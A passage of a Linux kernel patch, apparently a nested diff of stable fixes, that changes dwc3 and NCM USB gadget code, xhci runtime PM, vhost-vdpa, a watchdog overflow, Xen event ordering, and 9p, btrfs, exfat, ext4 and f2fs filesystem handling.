+@@ -1462,6 +1532,10 @@ static void dwc3_get_properties(struct dwc3 *dwc)
+ 	u8			lpm_nyet_threshold;
+ 	u8			tx_de_emphasis;
+ 	u8			hird_threshold;
++	u8			rx_thr_num_pkt = 0;
++	u8			rx_max_burst = 0;
++	u8			tx_thr_num_pkt = 0;
++	u8			tx_max_burst = 0;
+ 	u8			rx_thr_num_pkt_prd = 0;
+ 	u8			rx_max_burst_prd = 0;
+ 	u8			tx_thr_num_pkt_prd = 0;
+@@ -1524,6 +1598,14 @@ static void dwc3_get_properties(struct dwc3 *dwc)
+ 				"snps,usb2-lpm-disable");
+ 	dwc->usb2_gadget_lpm_disable = device_property_read_bool(dev,
+ 				"snps,usb2-gadget-lpm-disable");
++	device_property_read_u8(dev, "snps,rx-thr-num-pkt",
++				&rx_thr_num_pkt);
++	device_property_read_u8(dev, "snps,rx-max-burst",
++				&rx_max_burst);
++	device_property_read_u8(dev, "snps,tx-thr-num-pkt",
++				&tx_thr_num_pkt);
++	device_property_read_u8(dev, "snps,tx-max-burst",
++				&tx_max_burst);
+ 	device_property_read_u8(dev, "snps,rx-thr-num-pkt-prd",
+ 				&rx_thr_num_pkt_prd);
+ 	device_property_read_u8(dev, "snps,rx-max-burst-prd",
+@@ -1601,6 +1683,12 @@ static void dwc3_get_properties(struct dwc3 *dwc)
+ 
+ 	dwc->hird_threshold = hird_threshold;
+ 
++	dwc->rx_thr_num_pkt = rx_thr_num_pkt;
++	dwc->rx_max_burst = rx_max_burst;
++
++	dwc->tx_thr_num_pkt = tx_thr_num_pkt;
++	dwc->tx_max_burst = tx_max_burst;
++
+ 	dwc->rx_thr_num_pkt_prd = rx_thr_num_pkt_prd;
+ 	dwc->rx_max_burst_prd = rx_max_burst_prd;
+ 
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 80cc532ba9d55..889c122dad457 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -209,6 +209,11 @@
+ #define DWC3_GRXTHRCFG_RXPKTCNT(n) (((n) & 0xf) << 24)
+ #define DWC3_GRXTHRCFG_PKTCNTSEL BIT(29)
+ 
++/* Global TX Threshold Configuration Register */
++#define DWC3_GTXTHRCFG_MAXTXBURSTSIZE(n) (((n) & 0xff) << 16)
++#define DWC3_GTXTHRCFG_TXPKTCNT(n) (((n) & 0xf) << 24)
++#define DWC3_GTXTHRCFG_PKTCNTSEL BIT(29)
++
+ /* Global RX Threshold Configuration Register for DWC_usb31 only */
+ #define DWC31_GRXTHRCFG_MAXRXBURSTSIZE(n)	(((n) & 0x1f) << 16)
+ #define DWC31_GRXTHRCFG_RXPKTCNT(n)		(((n) & 0x1f) << 21)
+@@ -1041,6 +1046,10 @@ struct dwc3_scratchpad_array {
+  * @test_mode_nr: test feature selector
+  * @lpm_nyet_threshold: LPM NYET response threshold
+  * @hird_threshold: HIRD threshold
++ * @rx_thr_num_pkt: USB receive packet count
++ * @rx_max_burst: max USB receive burst size
++ * @tx_thr_num_pkt: USB transmit packet count
++ * @tx_max_burst: max USB transmit burst size
+  * @rx_thr_num_pkt_prd: periodic ESS receive packet count
+  * @rx_max_burst_prd: max periodic ESS receive burst size
+  * @tx_thr_num_pkt_prd: periodic ESS transmit packet count
+@@ -1268,6 +1277,10 @@ struct dwc3 {
+ 	u8			test_mode_nr;
+ 	u8			lpm_nyet_threshold;
+ 	u8			hird_threshold;
++	u8			rx_thr_num_pkt;
++	u8			rx_max_burst;
++	u8			tx_thr_num_pkt;
++	u8			tx_max_burst;
+ 	u8			rx_thr_num_pkt_prd;
+ 	u8			rx_max_burst_prd;
+ 	u8			tx_thr_num_pkt_prd;
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index faf90a2174194..bbb6ff6b11aa1 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -1425,7 +1425,7 @@ static int ncm_bind(struct usb_configuration *c, struct usb_function *f)
+ 	struct usb_composite_dev *cdev = c->cdev;
+ 	struct f_ncm		*ncm = func_to_ncm(f);
+ 	struct usb_string	*us;
+-	int			status;
++	int			status = 0;
+ 	struct usb_ep		*ep;
+ 	struct f_ncm_opts	*ncm_opts;
+ 
+@@ -1443,22 +1443,17 @@ static int ncm_bind(struct usb_configuration *c, struct usb_function *f)
+ 		f->os_desc_table[0].os_desc = &ncm_opts->ncm_os_desc;
+ 	}
+ 
+-	/*
+-	 * in drivers/usb/gadget/configfs.c:configfs_composite_bind()
+-	 * configurations are bound in sequence with list_for_each_entry,
+-	 * in each configuration its functions are bound in sequence
+-	 * with list_for_each_entry, so we assume no race condition
+-	 * with regard to ncm_opts->bound access
+-	 */
+-	if (!ncm_opts->bound) {
+-		mutex_lock(&ncm_opts->lock);
+-		gether_set_gadget(ncm_opts->net, cdev->gadget);
++	mutex_lock(&ncm_opts->lock);
++	gether_set_gadget(ncm_opts->net, cdev->gadget);
++	if (!ncm_opts->bound)
+ 		status = gether_register_netdev(ncm_opts->net);
+-		mutex_unlock(&ncm_opts->lock);
+-		if (status)
+-			goto fail;
+-		ncm_opts->bound = true;
+-	}
++	mutex_unlock(&ncm_opts->lock);
++
++	if (status)
++		goto fail;
++
++	ncm_opts->bound = true;
++
+ 	us = usb_gstrings_attach(cdev, ncm_strings,
+ 				 ARRAY_SIZE(ncm_string_defs));
+ 	if (IS_ERR(us)) {
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index c4dd648710ae0..24bcf6ab12d8a 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -508,7 +508,9 @@ static int xhci_pci_probe(struct pci_dev *dev, const struct pci_device_id *id)
+ 	/* USB-2 and USB-3 roothubs initialized, allow runtime pm suspend */
+ 	pm_runtime_put_noidle(&dev->dev);
+ 
+-	if (xhci->quirks & XHCI_DEFAULT_PM_RUNTIME_ALLOW)
++	if (pci_choose_state(dev, PMSG_SUSPEND) == PCI_D0)
++		pm_runtime_forbid(&dev->dev);
++	else if (xhci->quirks & XHCI_DEFAULT_PM_RUNTIME_ALLOW)
+ 		pm_runtime_allow(&dev->dev);
+ 
+ 	dma_set_max_seg_size(&dev->dev, UINT_MAX);
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index 31a156669a531..c8374527a27d9 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -1427,7 +1427,6 @@ static int vhost_vdpa_probe(struct vdpa_device *vdpa)
+ 
+ err:
+ 	put_device(&v->dev);
+-	ida_simple_remove(&vhost_vdpa_ida, v->minor);
+ 	return r;
+ }
+ 
+diff --git a/drivers/watchdog/sbsa_gwdt.c b/drivers/watchdog/sbsa_gwdt.c
+index 63862803421f1..7bf28545b47a0 100644
+--- a/drivers/watchdog/sbsa_gwdt.c
++++ b/drivers/watchdog/sbsa_gwdt.c
+@@ -153,14 +153,14 @@ static int sbsa_gwdt_set_timeout(struct watchdog_device *wdd,
+ 	timeout = clamp_t(unsigned int, timeout, 1, wdd->max_hw_heartbeat_ms / 1000);
+ 
+ 	if (action)
+-		sbsa_gwdt_reg_write(gwdt->clk * timeout, gwdt);
++		sbsa_gwdt_reg_write((u64)gwdt->clk * timeout, gwdt);
+ 	else
+ 		/*
+ 		 * In the single stage mode, The first signal (WS0) is ignored,
+ 		 * the timeout is (WOR * 2), so the WOR should be configured
+ 		 * to half value of timeout.
+ 		 */
+-		sbsa_gwdt_reg_write(gwdt->clk / 2 * timeout, gwdt);
++		sbsa_gwdt_reg_write(((u64)gwdt->clk / 2) * timeout, gwdt);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
+index 80b46de14f413..af9115d648092 100644
+--- a/drivers/xen/events/events_base.c
++++ b/drivers/xen/events/events_base.c
+@@ -600,7 +600,9 @@ static void lateeoi_list_add(struct irq_info *info)
+ 
+ 	spin_lock_irqsave(&eoi->eoi_list_lock, flags);
+ 
+-	if (list_empty(&eoi->eoi_list)) {
++	elem = list_first_entry_or_null(&eoi->eoi_list, struct irq_info,
++					eoi_list);
++	if (!elem || info->eoi_time < elem->eoi_time) {
+ 		list_add(&info->eoi_list, &eoi->eoi_list);
+ 		mod_delayed_work_on(info->eoi_cpu, system_wq,
+ 				    &eoi->delayed, delay);
+diff --git a/fs/9p/xattr.c b/fs/9p/xattr.c
+index 2807bb63f7802..3b9aa61de8c2d 100644
+--- a/fs/9p/xattr.c
++++ b/fs/9p/xattr.c
+@@ -65,7 +65,7 @@ ssize_t v9fs_xattr_get(struct dentry *dentry, const char *name,
+ 	struct p9_fid *fid;
+ 	int ret;
+ 
+-	p9_debug(P9_DEBUG_VFS, "name = %s value_len = %zu\n",
++	p9_debug(P9_DEBUG_VFS, "name = '%s' value_len = %zu\n",
+ 		 name, buffer_size);
+ 	fid = v9fs_fid_lookup(dentry);
+ 	if (IS_ERR(fid))
+@@ -136,7 +136,8 @@ int v9fs_fid_xattr_set(struct p9_fid *fid, const char *name,
+ 
+ ssize_t v9fs_listxattr(struct dentry *dentry, char *buffer, size_t buffer_size)
+ {
+-	return v9fs_xattr_get(dentry, NULL, buffer, buffer_size);
++	/* Txattrwalk with an empty string lists xattrs instead */
++	return v9fs_xattr_get(dentry, "", buffer, buffer_size);
+ }
+ 
+ static int v9fs_xattr_handler_get(const struct xattr_handler *handler,
+diff --git a/fs/btrfs/delalloc-space.c b/fs/btrfs/delalloc-space.c
+index 118b2e20b2e19..0b62ce77053f5 100644
+--- a/fs/btrfs/delalloc-space.c
++++ b/fs/btrfs/delalloc-space.c
+@@ -320,9 +320,6 @@ int btrfs_delalloc_reserve_metadata(struct btrfs_inode *inode, u64 num_bytes,
+ 	} else {
+ 		if (current->journal_info)
+ 			flush = BTRFS_RESERVE_FLUSH_LIMIT;
+-
+-		if (btrfs_transaction_in_commit(fs_info))
+-			schedule_timeout(1);
+ 	}
+ 
+ 	num_bytes = ALIGN(num_bytes, fs_info->sectorsize);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 4063447217f92..81eac121c6b23 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -7166,8 +7166,15 @@ static struct extent_map *btrfs_new_extent_direct(struct btrfs_inode *inode,
+ 	int ret;
+ 
+ 	alloc_hint = get_extent_allocation_hint(inode, start, len);
++again:
+ 	ret = btrfs_reserve_extent(root, len, len, fs_info->sectorsize,
+ 				   0, alloc_hint, &ins, 1, 1);
++	if (ret == -EAGAIN) {
++		ASSERT(btrfs_is_zoned(fs_info));
++		wait_on_bit_io(&inode->root->fs_info->flags, BTRFS_FS_NEED_ZONE_FINISH,
++			       TASK_UNINTERRUPTIBLE);
++		goto again;
++	}
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+diff --git a/fs/exfat/namei.c b/fs/exfat/namei.c
+index 90b0477911449..30e97c51f0e14 100644
+--- a/fs/exfat/namei.c
++++ b/fs/exfat/namei.c
+@@ -338,14 +338,20 @@ static int exfat_find_empty_entry(struct inode *inode,
+ 		if (exfat_check_max_dentries(inode))
+ 			return -ENOSPC;
+ 
+-		/* we trust p_dir->size regardless of FAT type */
+-		if (exfat_find_last_cluster(sb, p_dir, &last_clu))
+-			return -EIO;
+-
+ 		/*
+ 		 * Allocate new cluster to this directory
+ 		 */
+-		exfat_chain_set(&clu, last_clu + 1, 0, p_dir->flags);
++		if (ei->start_clu != EXFAT_EOF_CLUSTER) {
++			/* we trust p_dir->size regardless of FAT type */
++			if (exfat_find_last_cluster(sb, p_dir, &last_clu))
++				return -EIO;
++
++			exfat_chain_set(&clu, last_clu + 1, 0, p_dir->flags);
++		} else {
++			/* This directory is empty */
++			exfat_chain_set(&clu, EXFAT_EOF_CLUSTER, 0,
++					ALLOC_NO_FAT_CHAIN);
++		}
+ 
+ 		/* allocate a cluster */
+ 		ret = exfat_alloc_cluster(inode, 1, &clu, IS_DIRSYNC(inode));
+@@ -355,6 +361,11 @@ static int exfat_find_empty_entry(struct inode *inode,
+ 		if (exfat_zeroed_cluster(inode, clu.dir))
+ 			return -EIO;
+ 
++		if (ei->start_clu == EXFAT_EOF_CLUSTER) {
++			ei->start_clu = clu.dir;
++			p_dir->dir = clu.dir;
++		}
++
+ 		/* append to the FAT chain */
+ 		if (clu.flags != p_dir->flags) {
+ 			/* no-fat-chain bit is disabled,
+@@ -644,7 +655,7 @@ static int exfat_find(struct inode *dir, struct qstr *qname,
+ 	info->type = exfat_get_entry_type(ep);
+ 	info->attr = le16_to_cpu(ep->dentry.file.attr);
+ 	info->size = le64_to_cpu(ep2->dentry.stream.valid_size);
+-	if ((info->type == TYPE_FILE) && (info->size == 0)) {
++	if (info->size == 0) {
+ 		info->flags = ALLOC_NO_FAT_CHAIN;
+ 		info->start_clu = EXFAT_EOF_CLUSTER;
+ 	} else {
+@@ -888,6 +899,9 @@ static int exfat_check_dir_empty(struct super_block *sb,
+ 
+ 	dentries_per_clu = sbi->dentries_per_clu;
+ 
++	if (p_dir->dir == EXFAT_EOF_CLUSTER)
++		return 0;
++
+ 	exfat_chain_dup(&clu, p_dir);
+ 
+ 	while (clu.dir != EXFAT_EOF_CLUSTER) {
+@@ -1262,7 +1276,8 @@ static int __exfat_rename(struct inode *old_parent_inode,
+ 		}
+ 
+ 		/* Free the clusters if new_inode is a dir(as if exfat_rmdir) */
+-		if (new_entry_type == TYPE_DIR) {
++		if (new_entry_type == TYPE_DIR &&
++		    new_ei->start_clu != EXFAT_EOF_CLUSTER) {
+ 			/* new_ei, new_clu_to_free */
+ 			struct exfat_chain new_clu_to_free;
+ 
+diff --git a/fs/ext4/acl.h b/fs/ext4/acl.h
+index 3219669732bf4..0db6ae0ca9369 100644
+--- a/fs/ext4/acl.h
++++ b/fs/ext4/acl.h
+@@ -68,6 +68,11 @@ extern int ext4_init_acl(handle_t *, struct inode *, struct inode *);
+ static inline int
+ ext4_init_acl(handle_t *handle, struct inode *inode, struct inode *dir)
+ {
++	/* usually, the umask is applied by posix_acl_create(), but if
++	   ext4 ACL support is disabled at compile time, we need to do
++	   it here, because posix_acl_create() will never be called */
++	inode->i_mode &= ~current_umask();
++
+ 	return 0;
+ }
+ #endif  /* CONFIG_EXT4_FS_POSIX_ACL */
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 44e83521bfded..b57e497679ef9 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -1365,8 +1365,8 @@ retry:
+ 			}
+ 		}
+ 		if (count_reserved)
+-			count_rsvd(inode, lblk, orig_es.es_len - len1 - len2,
+-				   &orig_es, &rc);
++			count_rsvd(inode, orig_es.es_lblk + len1,
++				   orig_es.es_len - len1 - len2, &orig_es, &rc);
+ 		goto out_get_reserved;
+ 	}
+ 
+diff --git a/fs/ext4/file.c b/fs/ext4/file.c
+index a7a597c727e63..8ebe4dc7b0170 100644
+--- a/fs/ext4/file.c
++++ b/fs/ext4/file.c
+@@ -296,80 +296,38 @@ out:
+ }
+ 
+ static ssize_t ext4_handle_inode_extension(struct inode *inode, loff_t offset,
+-					   ssize_t written, size_t count)
++					   ssize_t count)
+ {
+ 	handle_t *handle;
+-	bool truncate = false;
+-	u8 blkbits = inode->i_blkbits;
+-	ext4_lblk_t written_blk, end_blk;
+-	int ret;
+-
+-	/*
+-	 * Note that EXT4_I(inode)->i_disksize can get extended up to
+-	 * inode->i_size while the I/O was running due to writeback of delalloc
+-	 * blocks. But, the code in ext4_iomap_alloc() is careful to use
+-	 * zeroed/unwritten extents if this is possible; thus we won't leave
+-	 * uninitialized blocks in a file even if we didn't succeed in writing
+-	 * as much as we intended.
+-	 */
+-	WARN_ON_ONCE(i_size_read(inode) < EXT4_I(inode)->i_disksize);
+-	if (offset + count <= EXT4_I(inode)->i_disksize) {
+-		/*
+-		 * We need to ensure that the inode is removed from the orphan
+-		 * list if it has been added prematurely, due to writeback of
+-		 * delalloc blocks.
+-		 */
+-		if (!list_empty(&EXT4_I(inode)->i_orphan) && inode->i_nlink) {
+-			handle = ext4_journal_start(inode, EXT4_HT_INODE, 2);
+-
+-			if (IS_ERR(handle)) {
+-				ext4_orphan_del(NULL, inode);
+-				return PTR_ERR(handle);
+-			}
+-
+-			ext4_orphan_del(handle, inode);
+-			ext4_journal_stop(handle);
+-		}
+-
+-		return written;
+-	}
+-
+-	if (written < 0)
+-		goto truncate;
+ 
++	lockdep_assert_held_write(&inode->i_rwsem);
+ 	handle = ext4_journal_start(inode, EXT4_HT_INODE, 2);
+-	if (IS_ERR(handle)) {
+-		written = PTR_ERR(handle);
+-		goto truncate;
+-	}
++	if (IS_ERR(handle))
++		return PTR_ERR(handle);
+ 
+-	if (ext4_update_inode_size(inode, offset + written)) {
+-		ret = ext4_mark_inode_dirty(handle, inode);
++	if (ext4_update_inode_size(inode, offset + count)) {
++		int ret = ext4_mark_inode_dirty(handle, inode);
+ 		if (unlikely(ret)) {
+-			written = ret;
+ 			ext4_journal_stop(handle);
+-			goto truncate;
++			return ret;
+ 		}
+ 	}
+ 
+-	/*
+-	 * We may need to truncate allocated but not written blocks beyond EOF.
+-	 */
+-	written_blk = ALIGN(offset + written, 1 << blkbits);
+-	end_blk = ALIGN(offset + count, 1 << blkbits);
+-	if (written_blk < end_blk && ext4_can_truncate(inode))
+-		truncate = true;
+-
+-	/*
+-	 * Remove the inode from the orphan list if it has been extended and
+-	 * everything went OK.
+-	 */
+-	if (!truncate && inode->i_nlink)
++	if (inode->i_nlink)
+ 		ext4_orphan_del(handle, inode);
+ 	ext4_journal_stop(handle);
+ 
+-	if (truncate) {
+-truncate:
++	return count;
++}
++
++/*
++ * Clean up the inode after DIO or DAX extending write has completed and the
++ * inode size has been updated using ext4_handle_inode_extension().
++ */
++static void ext4_inode_extension_cleanup(struct inode *inode, ssize_t count)
++{
++	lockdep_assert_held_write(&inode->i_rwsem);
++	if (count < 0) {
+ 		ext4_truncate_failed_write(inode);
+ 		/*
+ 		 * If the truncate operation failed early, then the inode may
+@@ -378,9 +336,28 @@ truncate:
+ 		 */
+ 		if (inode->i_nlink)
+ 			ext4_orphan_del(NULL, inode);
++		return;
+ 	}
++	/*
++	 * If i_disksize got extended due to writeback of delalloc blocks while
++	 * the DIO was running we could fail to cleanup the orphan list in
++	 * ext4_handle_inode_extension(). Do it now.
++	 */
++	if (!list_empty(&EXT4_I(inode)->i_orphan) && inode->i_nlink) {
++		handle_t *handle = ext4_journal_start(inode, EXT4_HT_INODE, 2);
+ 
+-	return written;
++		if (IS_ERR(handle)) {
++			/*
++			 * The write has successfully completed. Not much to
++			 * do with the error here so just cleanup the orphan
++			 * list and hope for the best.
++			 */
++			ext4_orphan_del(NULL, inode);
++			return;
++		}
++		ext4_orphan_del(handle, inode);
++		ext4_journal_stop(handle);
++	}
+ }
+ 
+ static int ext4_dio_write_end_io(struct kiocb *iocb, ssize_t size,
+@@ -389,31 +366,22 @@ static int ext4_dio_write_end_io(struct kiocb *iocb, ssize_t size,
+ 	loff_t pos = iocb->ki_pos;
+ 	struct inode *inode = file_inode(iocb->ki_filp);
+ 
++	if (!error && size && flags & IOMAP_DIO_UNWRITTEN)
++		error = ext4_convert_unwritten_extents(NULL, inode, pos, size);
+ 	if (error)
+ 		return error;
+-
+-	if (size && flags & IOMAP_DIO_UNWRITTEN) {
+-		error = ext4_convert_unwritten_extents(NULL, inode, pos, size);
+-		if (error < 0)
+-			return error;
+-	}
+ 	/*
+-	 * If we are extending the file, we have to update i_size here before
+-	 * page cache gets invalidated in iomap_dio_rw(). Otherwise racing
+-	 * buffered reads could zero out too much from page cache pages. Update
+-	 * of on-disk size will happen later in ext4_dio_write_iter() where
+-	 * we have enough information to also perform orphan list handling etc.
+-	 * Note that we perform all extending writes synchronously under
+-	 * i_rwsem held exclusively so i_size update is safe here in that case.
+-	 * If the write was not extending, we cannot see pos > i_size here
+-	 * because operations reducing i_size like truncate wait for all
+-	 * outstanding DIO before updating i_size.
++	 * Note that EXT4_I(inode)->i_disksize can get extended up to
++	 * inode->i_size while the I/O was running due to writeback of delalloc
++	 * blocks. But the code in ext4_iomap_alloc() is careful to use
++	 * zeroed/unwritten extents if this is possible; thus we won't leave
++	 * uninitialized blocks in a file even if we didn't succeed in writing
++	 * as much as we intended.
+ 	 */
+-	pos += size;
+-	if (pos > i_size_read(inode))
+-		i_size_write(inode, pos);
+-
+-	return 0;
++	WARN_ON_ONCE(i_size_read(inode) < READ_ONCE(EXT4_I(inode)->i_disksize));
++	if (pos + size <= READ_ONCE(EXT4_I(inode)->i_disksize))
++		return size;
++	return ext4_handle_inode_extension(inode, pos, size);
+ }
+ 
+ static const struct iomap_dio_ops ext4_dio_write_ops = {
+@@ -589,9 +557,16 @@ static ssize_t ext4_dio_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 			   NULL, 0);
+ 	if (ret == -ENOTBLK)
+ 		ret = 0;
+-
+-	if (extend)
+-		ret = ext4_handle_inode_extension(inode, offset, ret, count);
++	if (extend) {
++		/*
++		 * We always perform extending DIO write synchronously so by
++		 * now the IO is completed and ext4_handle_inode_extension()
++		 * was called. Cleanup the inode in case of error or race with
++		 * writeback of delalloc blocks.
++		 */
++		WARN_ON_ONCE(ret == -EIOCBQUEUED);
++		ext4_inode_extension_cleanup(inode, ret);
++	}
+ 
+ out:
+ 	if (ilock_shared)
+@@ -672,8 +647,10 @@ ext4_dax_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 
+ 	ret = dax_iomap_rw(iocb, from, &ext4_iomap_ops);
+ 
+-	if (extend)
+-		ret = ext4_handle_inode_extension(inode, offset, ret, count);
++	if (extend) {
++		ret = ext4_handle_inode_extension(inode, offset, ret);
++		ext4_inode_extension_cleanup(inode, ret);
++	}
+ out:
+ 	inode_unlock(inode);
+ 	if (ret > 0)
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 5aa3003cfc688..2479508deab3b 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -824,10 +824,22 @@ int ext4_get_block(struct inode *inode, sector_t iblock,
+ int ext4_get_block_unwritten(struct inode *inode, sector_t iblock,
+ 			     struct buffer_head *bh_result, int create)
+ {
++	int ret = 0;
++
+ 	ext4_debug("ext4_get_block_unwritten: inode %lu, create flag %d\n",
+ 		   inode->i_ino, create);
+-	return _ext4_get_block(inode, iblock, bh_result,
++	ret = _ext4_get_block(inode, iblock, bh_result,
+ 			       EXT4_GET_BLOCKS_CREATE_UNWRIT_EXT);
++
++	/*
++	 * If the buffer is marked unwritten, mark it as new to make sure it is
++	 * zeroed out correctly in case of partial writes. Otherwise, there is
++	 * a chance of stale data getting exposed.
++	 */
++	if (ret == 0 && buffer_unwritten(bh_result))
++		set_buffer_new(bh_result);
++
++	return ret;
+ }
+ 
+ /* Maximum number of blocks we map for direct IO at once. */
+diff --git a/fs/ext4/resize.c b/fs/ext4/resize.c
+index b493233750ab2..9833ab6db117c 100644
+--- a/fs/ext4/resize.c
++++ b/fs/ext4/resize.c
+@@ -560,13 +560,8 @@ static int setup_new_flex_group_blocks(struct super_block *sb,
+ 		if (meta_bg == 0 && !ext4_bg_has_super(sb, group))
+ 			goto handle_itb;
+ 
+-		if (meta_bg == 1) {
+-			ext4_group_t first_group;
+-			first_group = ext4_meta_bg_first_group(sb, group);
+-			if (first_group != group + 1 &&
+-			    first_group != group + EXT4_DESC_PER_BLOCK(sb) - 1)
+-				goto handle_itb;
+-		}
++		if (meta_bg == 1)
++			goto handle_itb;
+ 
+ 		block = start + ext4_bg_has_super(sb, group);
+ 		/* Copy all of the GDT blocks into the backup in this group */
+@@ -1191,8 +1186,10 @@ static void update_backups(struct super_block *sb, sector_t blk_off, char *data,
+ 			   ext4_group_first_block_no(sb, group));
+ 		BUFFER_TRACE(bh, "get_write_access");
+ 		if ((err = ext4_journal_get_write_access(handle, sb, bh,
+-							 EXT4_JTR_NONE)))
++							 EXT4_JTR_NONE))) {
++			brelse(bh);
+ 			break;
++		}
+ 		lock_buffer(bh);
+ 		memcpy(bh->b_data, data, size);
+ 		if (rest)
+@@ -1602,6 +1599,8 @@ exit_journal:
+ 		int gdb_num_end = ((group + flex_gd->count - 1) /
+ 				   EXT4_DESC_PER_BLOCK(sb));
+ 		int meta_bg = ext4_has_feature_meta_bg(sb);
++		sector_t padding_blocks = meta_bg ? 0 : sbi->s_sbh->b_blocknr -
++					 ext4_group_first_block_no(sb, 0);
+ 		sector_t old_gdb = 0;
+ 
+ 		update_backups(sb, ext4_group_first_block_no(sb, 0),
+@@ -1613,8 +1612,8 @@ exit_journal:
+ 						     gdb_num);
+ 			if (old_gdb == gdb_bh->b_blocknr)
+ 				continue;
+-			update_backups(sb, gdb_bh->b_blocknr, gdb_bh->b_data,
+-				       gdb_bh->b_size, meta_bg);
++			update_backups(sb, gdb_bh->b_blocknr - padding_blocks,
++				       gdb_bh->b_data, gdb_bh->b_size, meta_bg);
+ 			old_gdb = gdb_bh->b_blocknr;
+ 		}
+ 	}
+@@ -1983,9 +1982,7 @@ static int ext4_convert_meta_bg(struct super_block *sb, struct inode *inode)
+ 
+ errout:
+ 	ret = ext4_journal_stop(handle);
+-	if (!err)
+-		err = ret;
+-	return ret;
++	return err ? err : ret;
+ 
+ invalid_resize_inode:
+ 	ext4_error(sb, "corrupted/inconsistent resize inode");
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index fb75ff7b3448d..11d9dce994dbe 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1983,7 +1983,7 @@ void f2fs_destroy_compress_inode(struct f2fs_sb_info *sbi)
+ int f2fs_init_page_array_cache(struct f2fs_sb_info *sbi)
+ {
+ 	dev_t dev = sbi->sb->s_bdev->bd_dev;
+-	char slab_name[32];
++	char slab_name[35];
+ 
+ 	if (!f2fs_sb_has_compression(sbi))
+ 		return 0;
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index a010b4bc36d2c..6efccd7ccfe1b 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -1455,7 +1455,8 @@ page_hit:
+ 			  ofs_of_node(page), cpver_of_node(page),
+ 			  next_blkaddr_of_node(page));
+ 	set_sbi_flag(sbi, SBI_NEED_FSCK);
+-	err = -EINVAL;
++	f2fs_handle_error(sbi, ERROR_INCONSISTENT_FOOTER);
++	err = -EFSCORRUPTED;
+ out_err:
+ 	ClearPageUptodate(page);
+ out_put_err:
+@@ -2737,7 +2738,9 @@ recover_xnid:
+ 	f2fs_update_inode_page(inode);
+ 
+ 	/* 3: update and set xattr node page dirty */
+-	memcpy(F2FS_NODE(xpage), F2FS_NODE(page), VALID_XATTR_BLOCK_SIZE);
++	if (page)
++		memcpy(F2FS_NODE(xpage), F2FS_NODE(page),
++				VALID_XATTR_BLOCK_SIZE);
+ 
+ 	set_page_dirty(xpage);
+ 	f2fs_put_page(xpage, 1);
+diff --git a/fs/f2fs/xattr.c b/fs/f2fs/xattr.c
+index db3b641f2158c..adaad16468d8a 100644
+--- a/fs/f2fs/xattr.c
++++ b/fs/f2fs/xattr.c
+@@ -363,10 +363,10 @@ static int lookup_all_xattrs(struct inode *inode, struct page *ipage,
+ 
+ 	*xe = __find_xattr(cur_addr, last_txattr_addr, NULL, index, len, name);
+ 	if (!*xe) {
+-		f2fs_err(F2FS_I_SB(inode), "inode (%lu) has corrupted xattr",
++		f2fs_err(F2FS_I_SB(inode), "lookup inode (%lu) has corrupted xattr",
+ 								inode->i_ino);
+ 		set_sbi_flag(F2FS_I_SB(inode), SBI_NEED_FSCK);
+-		err = -EFSCORRUPTED;
++		err = -ENODATA;
+ 		f2fs_handle_error(F2FS_I_SB(inode),
+ 					ERROR_CORRUPTED_XATTR);
+ 		goto out;
+@@ -583,13 +583,12 @@ ssize_t f2fs_listxattr(struct dentry *dentry, char *buffer, size_t buffer_size)
+ 
+ 		if ((void *)(entry) + sizeof(__u32) > last_base_addr ||
+ 			(void *)XATTR_NEXT_ENTRY(entry) > last_base_addr) {
+-			f2fs_err(F2FS_I_SB(inode), "inode (%lu) has corrupted xattr",
++			f2fs_err(F2FS_I_SB(inode), "list inode (%lu) has corrupted xattr",
+ 						inode->i_ino);
+ 			set_sbi_flag(F2FS_I_SB(inode), SBI_NEED_FSCK);
+-			error = -EFSCORRUPTED;
+ 			f2fs_handle_error(F2FS_I_SB(inode),
+ 						ERROR_CORRUPTED_XATTR);
+-			goto cleanup;
++			break;
+ 		}
+ 
+ 		if (!handler || (handler->list && !handler->list(dentry)))
+@@ -650,7 +649,7 @@ static int __f2fs_setxattr(struct inode *inode, int index,
+ 
+ 	if (size > MAX_VALUE_LEN(inode))
+ 		return -E2BIG;
+-
++retry:
+ 	error = read_all_xattrs(inode, ipage, &base_addr);
+ 	if (error)
+ 		return error;
+@@ -660,7 +659,14 @@ static int __f2fs_setxattr(struct inode *inode, int index,
+ 	/* find entry with wanted name. */
+ 	here = __find_xattr(base_addr, last_base_addr, NULL, index, len, name);
+ 	if (!here) {
+-		f2fs_err(F2FS_I_SB(inode), "inode (%lu) has corrupted xattr",
++		if (!F2FS_I(inode)->i_xattr_nid) {
++			f2fs_notice(F2FS_I_SB(inode),
++				"recover xattr in inode (%lu)", inode->i_ino);
++			f2fs_recover_xattr_data(inode, NULL);
++			kfree(base_addr);
++			goto retry;
++		}
++		f2fs_err(F2FS_I_SB(inode), "set inode (%lu) has corrupted xattr",
+ 								inode->i_ino);
